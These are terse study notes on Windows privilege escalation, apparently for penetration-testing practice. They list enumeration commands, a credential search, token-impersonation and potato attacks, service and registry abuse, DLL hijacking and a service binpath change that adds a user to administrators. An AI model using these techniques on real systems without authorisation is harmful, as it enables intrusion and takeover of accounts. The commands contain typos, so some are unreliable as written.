Windows Privilege-Escalation
Automated tooling exists:
Manual Enumeration
Let’s start with system information
systeminfo | findstr /b /c:"OS Name" /c:"OS Versoin" /c:"System Type"
wmic qfe
wmic qfe Caption,Description,HotFixID,InstalledOn
wmic logicaldisk
wmic logicaldisk get caption,description,providername
wmic logicaldisk get caption
Then get some information about the current user, their privileges and groups; and about all available users and groups:
whoami /priv
whoami /groups
net user
net user user
net localgroup group
Network Information:
ipconfig # check for multi-homed machines
ipconfig /all
arp -a
route print
netstat -ano
Search for passwords
findstr /si password *.txt *.ini *.config
Anti-Virus Enumeration
sc query windefend
sc queryex type= service
netsh advfirewall firewall dump
netsh firewall show state
netsh firewall show config
Automated Enumeration/Tools
There are multiple automated enumeration tools
Some unmaintained (or outdated projects): sherlock.ps1, watson, jaws-enum.ps1
Privilege Escalation
Automated Tooling
- powerup (not maintained anymore)/sharpup
-, exploit suggester (metasploit)
- powershell → run post/multi/recon/local_exploit_suggester
- metasploit
- a named pipe + in-memory dll
- a named pipe + drops a dll to the disk
- token impersonation
windows kernel exploits
- maybe use metasploit for this
Impersonation and Potato Attacks (jeeves)
whoami /priv
use mimikatz, etc. to show tokens
meterpreter → getprivs
priv2admin →
if we have SeAssignPrimaryToken → we can do PotatoAttacks (oder SeImpersonatePrivilege)
potato attacks
- creates a new token
- then impersonate this token
- mostly works for service accounts
- check for *potato
do the same form meterpreter
- run post/multi/recon/local_exploit_suggester
- use windows/local/ms16_075_reflection
- run
- load incognito
- list_tokens -u
- impersonate_token
registry exploits
autorun feature
# use sysinternals autorun64
# or: replace found program with meterpreter reverse shell
accesschk64 -wvu "c:\program files\autorun programs"
# powerup.ps1/sharpup
alwaysinstall elevated
reg query HKLM\Software\Policies\Microsoft\Windows\Installer'
- user msfvenom to create a new payload → just create a msi instead of an exe payload
regsrv escalation
- Get-Alc -Path search for regsvc interactive
- regsvc → FullControl allowed
- compile a new service
- install it with reg add
- sc start regsvc
executable files as a service
# again we can use powerup/shartup for scanning
# or manually check
accesschk64 -wvu "c:\program files\file permissions service" RW FILE_ALL_ACCESS
- replace current binary with backdoor
sc start filepermservice
startup applications
icacls.exe "c:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup"
- replace file
- logout and login to execute the payload
DLL hijacking
- search for an executable that uses a DLL
- run procmon.exe
- add filter: “result is NAME NOT FOUND”
- and “PATH ends with .dll”
- now search for something where we can write to
- add filter: “result is NAME NOT FOUND”
- windows_dll.c source code for creating a service
- could use msfvenom for this too
service permissions (path)
accesschk64 -wuvc Everyone *
accesschk64 -wuvc daclsvc
sc qc daclsvc -> BINARY_PATH_NAME
sc config daclsvc binpath="net localgroup administrators user /add"